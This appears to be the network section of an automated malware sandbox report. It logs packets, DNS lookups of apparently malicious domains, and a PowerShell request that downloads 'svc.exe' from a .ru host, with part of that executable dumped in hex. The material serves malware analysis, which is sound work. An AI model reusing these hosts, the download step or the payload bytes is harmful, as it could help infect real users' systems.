                                                                                                          Oct 4, 2024 16:36:36.662724972 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.662772894 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.662806988 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.662831068 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.663172960 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.663206100 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.663238049 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.663243055 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.663270950 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.663291931 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.663305044 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.663335085 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.663348913 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.663367033 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.663410902 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.663453102 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.663486004 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.663517952 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.663533926 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.663554907 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.663609982 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664002895 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664036036 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664084911 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664088964 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664113998 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664161921 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664165974 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664196014 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664225101 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664241076 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664261103 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664278984 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664328098 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664352894 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664361000 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664374113 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664392948 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664429903 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664439917 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664441109 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664475918 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664491892 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664522886 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664540052 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664546967 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664572954 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664604902 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664635897 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664666891 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664696932 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664696932 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664697886 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664731979 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664741993 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664762974 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664796114 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664813995 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664827108 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664859056 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664870977 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664892912 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664925098 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664957047 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664972067 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.664989948 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.664994955 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.665021896 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665060997 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665067911 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.665071964 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665106058 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665118933 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.665137053 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665169001 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665199041 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665201902 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.665232897 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665245056 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.665266037 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665297985 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665311098 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.665329933 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665363073 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665373087 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.665395975 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665426970 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665457964 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665466070 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.665493011 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.665539026 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.672458887 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672473907 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672485113 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672494888 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672509909 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672521114 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672522068 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.672530890 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672544003 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672554016 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672564030 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672578096 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672580004 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.672590017 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672599077 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672600031 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.672611952 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672616959 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.672621965 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672631979 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672641993 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672642946 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.672653913 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672665119 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672673941 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672682047 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.672683954 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672694921 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672703981 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.672707081 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672719002 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.672719955 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.672744036 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.722614050 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.746161938 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746201992 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746213913 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746258020 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.746300936 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746313095 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746324062 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746341944 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.746380091 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.746486902 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746499062 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746558905 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.746606112 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746618032 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746628046 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746638060 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746659040 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.746684074 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.746859074 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746871948 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746882915 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746893883 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.746906996 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.746933937 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.747026920 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.800739050 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.840115070 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.840157986 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.840192080 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.840224028 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.840224028 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.840260029 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.840306997 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.840672016 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.840703964 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.840737104 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.840751886 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.840769053 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.840801001 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.840818882 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.840894938 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.840965986 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:36:36.841047049 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.844913960 CEST4969980192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:36:36.853060007 CEST8049699193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:05.220988989 CEST4984580192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:37:05.226114988 CEST8049845193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:05.226190090 CEST4984580192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:37:05.226434946 CEST4984580192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:37:05.226464033 CEST4984580192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:37:05.231378078 CEST8049845193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:05.231472969 CEST8049845193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:06.339015961 CEST8049845193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:06.339040041 CEST8049845193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:06.339157104 CEST4984580192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:37:06.347580910 CEST4984580192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:37:06.352741003 CEST8049845193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:06.814291954 CEST4985680192.168.2.7188.40.141.211
                                                                                                          Oct 4, 2024 16:37:06.823272943 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:06.825452089 CEST4985680192.168.2.7188.40.141.211
                                                                                                          Oct 4, 2024 16:37:06.825609922 CEST4985680192.168.2.7188.40.141.211
                                                                                                          Oct 4, 2024 16:37:06.825619936 CEST4985680192.168.2.7188.40.141.211
                                                                                                          Oct 4, 2024 16:37:06.835412025 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:06.836949110 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:07.713541985 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:07.718485117 CEST4985680192.168.2.7188.40.141.211
                                                                                                          Oct 4, 2024 16:37:07.718486071 CEST4985680192.168.2.7188.40.141.211
                                                                                                          Oct 4, 2024 16:37:07.723491907 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:07.723534107 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:08.056991100 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:08.097750902 CEST4985680192.168.2.7188.40.141.211
                                                                                                          Oct 4, 2024 16:37:30.662256956 CEST4997480192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:37:30.667538881 CEST8049974193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:30.667685032 CEST4997480192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:37:30.667890072 CEST4997480192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:37:30.667933941 CEST4997480192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:37:30.672935009 CEST8049974193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:30.672969103 CEST8049974193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:32.793679953 CEST8049974193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:32.793847084 CEST8049974193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:32.793926954 CEST4997480192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:37:32.794718027 CEST4997480192.168.2.7193.46.217.78
                                                                                                          Oct 4, 2024 16:37:32.796794891 CEST4985680192.168.2.7188.40.141.211
                                                                                                          Oct 4, 2024 16:37:32.796825886 CEST4985680192.168.2.7188.40.141.211
                                                                                                          Oct 4, 2024 16:37:32.803638935 CEST8049974193.46.217.78192.168.2.7
                                                                                                          Oct 4, 2024 16:37:32.804101944 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:32.805218935 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:33.136367083 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:33.144893885 CEST4985680192.168.2.7188.40.141.211
                                                                                                          Oct 4, 2024 16:37:33.144922018 CEST4985680192.168.2.7188.40.141.211
                                                                                                          Oct 4, 2024 16:37:33.149658918 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:33.149769068 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:33.488718987 CEST8049856188.40.141.211192.168.2.7
                                                                                                          Oct 4, 2024 16:37:33.535418987 CEST4985680192.168.2.7188.40.141.211
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 4, 2024 16:36:34.268575907 CEST5815553192.168.2.71.1.1.1
                                                                                                          Oct 4, 2024 16:36:34.876312017 CEST53581551.1.1.1192.168.2.7
                                                                                                          Oct 4, 2024 16:37:04.745117903 CEST5186953192.168.2.71.1.1.1
                                                                                                          Oct 4, 2024 16:37:05.220062017 CEST53518691.1.1.1192.168.2.7
                                                                                                          Oct 4, 2024 16:37:06.351067066 CEST5301553192.168.2.71.1.1.1
                                                                                                          Oct 4, 2024 16:37:06.810760021 CEST53530151.1.1.1192.168.2.7
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Oct 4, 2024 16:36:34.268575907 CEST192.168.2.71.1.1.10xcb83Standard query (0)bestmagazineforanimalsunicum.ruA (IP address)IN (0x0001)false
                                                                                                          Oct 4, 2024 16:37:04.745117903 CEST192.168.2.71.1.1.10x9841Standard query (0)unicexpertmagazine.pwA (IP address)IN (0x0001)false
                                                                                                          Oct 4, 2024 16:37:06.351067066 CEST192.168.2.71.1.1.10x3692Standard query (0)ceoconstractionstore.plA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Oct 4, 2024 16:36:34.876312017 CEST1.1.1.1192.168.2.70xcb83No error (0)bestmagazineforanimalsunicum.ru193.46.217.78A (IP address)IN (0x0001)false
                                                                                                          Oct 4, 2024 16:37:05.220062017 CEST1.1.1.1192.168.2.70x9841No error (0)unicexpertmagazine.pw193.46.217.78A (IP address)IN (0x0001)false
                                                                                                          Oct 4, 2024 16:37:06.810760021 CEST1.1.1.1192.168.2.70x3692No error (0)ceoconstractionstore.pl188.40.141.211A (IP address)IN (0x0001)false
                                                                                                          • bestmagazineforanimalsunicum.ru
                                                                                                          • xedfkhosquhy.org
                                                                                                            • unicexpertmagazine.pw
                                                                                                          • utsxpdquoutvtc.com
                                                                                                            • ceoconstractionstore.pl
                                                                                                          • rfcqeahtpbrxjuy.net
                                                                                                          • obbtjayrfmnjdrv.net
                                                                                                          • fwtilsrhssulldop.com
                                                                                                          • ooxywteyveq.com
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.749699193.46.217.78806016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 4, 2024 16:36:35.220380068 CEST97OUTGET /download/svc.exe HTTP/1.1
                                                                                                          Host: bestmagazineforanimalsunicum.ru
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 4, 2024 16:36:36.183665037 CEST1236INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 04 Oct 2024 14:36:36 GMT
                                                                                                          Content-Type: application/x-msdos-program
                                                                                                          Content-Length: 222720
                                                                                                          Connection: close
                                                                                                          Last-Modified: Wed, 02 Oct 2024 05:06:08 GMT
                                                                                                          ETag: "36600-62377654eb000"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 d2 fc 49 42 b3 92 1a 42 b3 92 1a 42 b3 92 1a 5c e1 16 1a 5e b3 92 1a 5c e1 07 1a 51 b3 92 1a 5c e1 11 1a 1e b3 92 1a 65 75 e9 1a 45 b3 92 1a 42 b3 93 1a 32 b3 92 1a 5c e1 18 1a 43 b3 92 1a 5c e1 06 1a 43 b3 92 1a 5c e1 03 1a 43 b3 92 1a 52 69 63 68 42 b3 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1e 60 49 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 80 01 00 00 64 11 00 00 00 00 00 16 17 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 13 00 00 04 00 00 03 a2 03 00 02 00 00 80 00 00 [TRUNCATED]
                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$IBBB\^\Q\euEB2\C\C\CRichBPEL`Ied@DPPX.text~ `.rdata" "@@.data@.tls@@.rsrcP@@
                                                                                                          Oct 4, 2024 16:36:36.183700085 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 08 c0 41 00 75 02 f3 c3 e9 11 07 00 00 6a 0c 68 90 a4 41 00 e8 05 15 00 00 8b 75 08 85 f6 74
                                                                                                          Data Ascii: ;AujhAutu=?QuCjYeVYEtVP>YYE}u7ujYVj5AAuhAPYUQeVEPu
                                                                                                          Oct 4, 2024 16:36:36.183711052 CEST1236INData Raw: ff 75 08 e8 55 16 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 9e 07 00 00 85 c0 74 0a e8 95 07 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 8b ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 6b 19 00 00 83 c4 0c 5d c3 8b ff 55 8b ec 8b 45 08 56 8b f1 c6 46 0c
                                                                                                          Data Ascii: uUu9EttM^Ujjuk]UEVFucH&FHlHhN;AtAHpu"F;AtFAHpuWFF@puHpF@F^]U(SVuMdu3;u(SSSSS
                                                                                                          Oct 4, 2024 16:36:36.183728933 CEST1236INData Raw: ff 75 08 e8 61 2f 00 00 68 ff 00 00 00 e8 27 fd ff ff 59 59 5d c3 6a 58 68 d0 a4 41 00 e8 7b 0f 00 00 33 f6 89 75 fc 8d 45 98 50 ff 15 c0 90 41 00 6a fe 5f 89 7d fc b8 4d 5a 00 00 66 39 05 00 00 40 00 75 38 a1 3c 00 40 00 81 b8 00 00 40 00 50 45
                                                                                                          Data Ascii: ua/h'YY]jXhA{3uEPAj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CSoYujXY~"ujGY1];}j&Y;?Qo;xA:}jYw8}j
                                                                                                          Oct 4, 2024 16:36:36.183739901 CEST1236INData Raw: 5e 5d c3 8b ff 55 8b ec 8b 0d c4 3f 51 00 a1 c8 3f 51 00 6b c9 14 03 c8 eb 11 8b 55 08 2b 50 0c 81 fa 00 00 10 00 72 09 83 c0 14 3b c1 72 eb 33 c0 5d c3 8b ff 55 8b ec 83 ec 10 8b 4d 08 8b 41 10 56 8b 75 0c 57 8b fe 2b 79 0c 83 c6 fc c1 ef 0f 8b
                                                                                                          Data Ascii: ^]U?Q?QkU+Pr;r3]UMAVuW+yiDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y]S[MMZU
                                                                                                          Oct 4, 2024 16:36:36.183749914 CEST1236INData Raw: c4 00 00 00 8a 46 43 8a c8 fe c1 84 c0 8b 45 08 88 4e 43 75 03 09 78 04 ba 00 00 00 80 8b cb d3 ea f7 d2 21 50 08 8b c3 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 0c 8b 4d 08 8b 41 10 53 56 8b 75 10 57 8b 7d 0c 8b d7 2b 51 0c 83 c6 17 c1 ea 0f 8b ca 69
                                                                                                          Data Ascii: FCENCux!P_^[UMASVuW}+QiDMOI;|9M]UE;;MIM?vj?YM_;_uC sML!\Du&M!ML!uM!YO
                                                                                                          Oct 4, 2024 16:36:36.183760881 CEST896INData Raw: 21 0b eb 2c 8d 4f e0 d3 eb 8b 4d fc 8d 8c 88 c4 00 00 00 8d 7c 38 04 f7 d3 21 19 fe 0f 89 5d ec 75 0b 8b 5d 08 8b 4d ec 21 4b 04 eb 03 8b 5d 08 83 7d f8 00 8b 4a 08 8b 7a 04 89 79 04 8b 4a 04 8b 7a 08 89 79 08 0f 84 8d 00 00 00 8b 4d f4 8d 0c f1
                                                                                                          Data Ascii: !,OM|8!]u]M!K]}JzyJzyMyJzQJQJ;Ju^LM L}#}u;M|D)}uN{MN7MtLMuNL2uy
